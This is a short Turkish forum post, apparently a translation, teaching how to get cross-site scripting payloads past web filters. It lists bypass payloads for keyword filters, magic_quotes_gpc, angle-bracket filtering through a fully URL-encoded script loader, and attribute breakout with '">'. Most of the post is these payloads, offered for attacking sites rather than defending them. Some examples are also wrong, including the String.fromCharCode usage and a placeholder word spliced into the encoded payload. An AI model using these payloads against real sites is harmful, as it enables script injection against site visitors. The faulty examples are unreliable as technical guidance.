Neler Yeni

XSS ByPass

Katılım
22 Nis 2020
Mesajlar
86
Tepkime puanı
23
Puanları
150
Merhabalar arkadaslar bugun sizlere XSS yaparken karsilastigimiz filtreleri bypass etmeyi gosterecegim.

Kelime Filtreleri ; Bu filtreler bizim zararli kelimelerimizi filtreler ve scriptte alertlari almamizi engeller yahut alertleri ekrana pencere seklinde vurdurmaz. Bu filtreyi bypass etmek icin script kelimesinin karakterlerini degistirebilirsiniz.

Normalde ; <script>alert(’DH’)</script>
Bypass ; <Script>aLeRt(’DH’)</Script>


magic_quotes_gpc Filtreleri ; Bu filtre de bu gibi karakterleri kullanmamiza izin vermez ; / . and , vs. Bu filtreyi bypass etmek icin ise String.fromCharCode() komutunu ve alert kelimemizin ASCII halini kullanmamiz gerekir.

Normalde ; <script>alert(’DH’)</script>
Bypass ; <script>String.fromCharCode(’DH’)</script>


NOT: DH ( yada siz ne yazarsaniz ) ASCII formunda olmalidir.


Coverting into full html Bypass ; Bazen filtreler < karakterini iceren yazilari limitlerler. Bu filtreyi bypass etmek icin de string komutu full html e cevirmemiz gerekir.

Normalde ; <script>alert(’DH’)</script>
Bypass ;<%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D“ZararliKod%61%76%61%73%63%72%69%70%74“>%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D’’%3B%66%6F%72%28%69%3D%30%3B%69<%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D<%2F%73%63%72%69%70%74>

NOT : Deneme ile Bypass ;

Ornek ; "<script>alert(’DH’)</script>

Bypass ; "><script>alert(’DH’)</script>


Bu komutu ekleyerek asmaya calistik filtremizi ; ">"


Evet arkadaslar benden bu kadar.

Makale, tarafimdan Turkceye cevrilmistir. Tarxes //
 

Konuyu görüntüleyen kullanıcılar

Üst